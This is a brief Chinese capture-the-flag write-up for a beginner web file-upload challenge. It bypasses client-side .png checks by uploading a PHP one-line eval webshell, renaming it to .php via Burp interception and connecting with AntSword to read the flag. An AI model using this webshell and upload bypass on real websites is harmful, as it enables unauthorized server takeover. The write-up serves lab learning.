ctf show web 入门151

根据题目这是一道文件上传相关题目,我们先查看源代码看看有什么信息

这里说明只允许上传以png结尾的文件那么我们构造一个一句话木马但是以.png为后缀来绕过前端验证

构造的payload为: <?php @eval($_POST'attack');?>

密码为:attack

然后将文件命名为:文件名.png后上传文件同时打开bp抓包

将后缀重新改为.php文件就以.php的形式上传成功所以我们可以使用蚁剑连接

要注意我们需要将https改为http才能成功连接,接下来我们就掌握了该网站的控制权

最后发现flag在:/var/www/html/flag.php目录下

相关推荐
六点_dn22 分钟前
RabbitMQ学习笔记-定义与作用
笔记·学习·rabbitmq
香辣牛肉饭3 小时前
【算法】动态规划 最长公共子序列(LCS)
经验分享·笔记·算法·动态规划
迷途呀3 小时前
Python:函数中的参数类型
开发语言·笔记·python·langchain·nlp
依然范特东4 小时前
动手学深度学习笔记--卷积层、微调
人工智能·笔记·深度学习
金伟API10245 小时前
SQL Server基础学习笔记
笔记·学习
砚凝霜6 小时前
软考网络工程师|第 1 章 计算机网络基础 完整备考笔记
网络·笔记·计算机网络
岑梓铭6 小时前
《考研408数据结构》第七章(7.1 查找:顺序查找、折半查找、分块查找)复习笔记
数据结构·笔记·考研·408·ds·查找
金伟API10247 小时前
常见的SQL面试题:经典50例
数据库·人工智能·笔记·sql·学习
DES 仿真实践家7 小时前
Plant Simulation SimTalk基础教程(3)SimTalk 变量与数据类型
开发语言·笔记·学习
逸模8 小时前
多业态连锁,如何同步铺开各类门店
大数据·人工智能·笔记·工程·公装·连锁店